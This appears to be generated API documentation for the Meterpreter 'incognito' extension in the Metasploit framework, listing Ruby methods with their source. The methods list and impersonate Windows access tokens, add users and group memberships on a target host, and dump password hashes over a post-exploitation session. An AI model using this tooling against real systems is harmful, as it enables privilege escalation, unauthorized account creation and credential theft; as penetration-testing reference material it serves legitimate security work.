Class: Rex::Post::Meterpreter::Extensions::Incognito::Incognito

Inherits:
Rex::Post::Meterpreter::Extension show all
Defined in:
lib/rex/post/meterpreter/extensions/incognito/incognito.rb

Overview

This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.

Instance Attribute Summary

Attributes inherited from Rex::Post::Meterpreter::Extension

#client, #name

Class Method Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(client) ⇒ Incognito

Returns a new instance of Incognito.



25
26
27
28
29
30
31
32
33
34
35
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 25

def initialize(client)
  super(client, 'incognito')

  client.register_extension_aliases(
    [
      {
        'name' => 'incognito',
        'ext'  => self
      },
    ])
end

Class Method Details

.extension_idObject 



21
22
23
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 21

def self.extension_id
  EXTENSION_ID_INCOGNITO
end

Instance Method Details

#incognito_add_group_user(host, groupname, username) ⇒ Object 



67
68
69
70
71
72
73
74
75
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 67

def incognito_add_group_user(host, groupname, username)
  request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_GROUP_USER)
  request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
  request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
  request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
  response = client.send_request(request)

  response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_add_localgroup_user(host, groupname, username) ⇒ Object 



77
78
79
80
81
82
83
84
85
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 77

def incognito_add_localgroup_user(host, groupname, username)
  request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER)
  request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
  request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
  request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
  response = client.send_request(request)

  response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_add_user(host, username, password) ⇒ Object 



57
58
59
60
61
62
63
64
65
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 57

def incognito_add_user(host, username, password)
  request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_USER)
  request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
  request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
  request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
  response = client.send_request(request)

  response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_impersonate_token(username) ⇒ Object 



49
50
51
52
53
54
55
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 49

def incognito_impersonate_token(username)
  request = Packet.create_request(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN)
  request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
  response = client.send_request(request)

  response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_list_tokens(token_order) ⇒ Object 



37
38
39
40
41
42
43
44
45
46
47
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 37

def incognito_list_tokens(token_order)
  request = Packet.create_request(COMMAND_ID_INCOGNITO_LIST_TOKENS)
  request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)

  response = client.send_request(request)

  {
    'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),
    'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
  }
end

#incognito_snarf_hashes(host) ⇒ Object 



87
88
89
90
91
92
93
 
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 87

def incognito_snarf_hashes(host)
  request = Packet.create_request(COMMAND_ID_INCOGNITO_SNARF_HASHES)
  request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
  client.send_request(request)

  true
end